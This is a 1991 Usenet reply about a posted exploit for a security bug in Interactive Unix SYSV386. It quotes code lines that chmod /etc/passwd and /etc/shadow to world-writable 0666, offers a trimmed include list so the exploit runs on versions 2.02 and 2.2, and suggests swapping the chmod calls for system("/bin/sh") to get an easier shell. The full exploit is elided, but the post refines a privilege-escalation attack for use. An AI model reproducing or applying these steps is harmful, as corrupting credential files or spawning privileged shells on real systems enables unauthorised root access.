Path: utzoo!utgpu!news-server.csri.toronto.edu!cs.utexas.edu!uunet!mcsun!unido!horga!veeble!influx!hsch
From: hsch@influx.sub.org (Heinrich Schnermann)
Newsgroups: comp.unix.sysv386
Subject: Re: SECURITY BUG IN INTERACTIVE UNIX SYSV386 (REPOST)
Message-ID: <1991Feb17.130709.7734@influx.sub.org>
Date: 17 Feb 91 13:07:09 GMT
References: <LW6NAWC@dobag.in-berlin.de>
Organization: Heinrich Schnermann, Hannover
Lines: 29

lumpi@dobag.in-berlin.de (Joern Lubkoll) writes:

>/* If you use Interactive Unix 2.2 uncomment the following line */
>/* #define ISC22 */
[15 lines of includes, ifdefs and defines follow]

What do you think about a shorter version like this?

	#include <sys/types.h>
	#include <sys/signal.h>
	#include <sys/dir.h>
	#include <sys/user.h>

Runs on Interactive 2.02 *and* 2.2.

>  chmod ("/etc/passwd",(int) 0666);
>  chmod ("/etc/shadow",(int) 0666);

Not very nice, even in Lumpi's compiled version. A little

	system("/bin/sh");

instead of chmod wouldn't change anything and would be quite more
easy to handle.

Heinrich

-- 
Heinrich Schnermann, Wichmannstr.26, 3000 Hannover 81, +49 511 835 603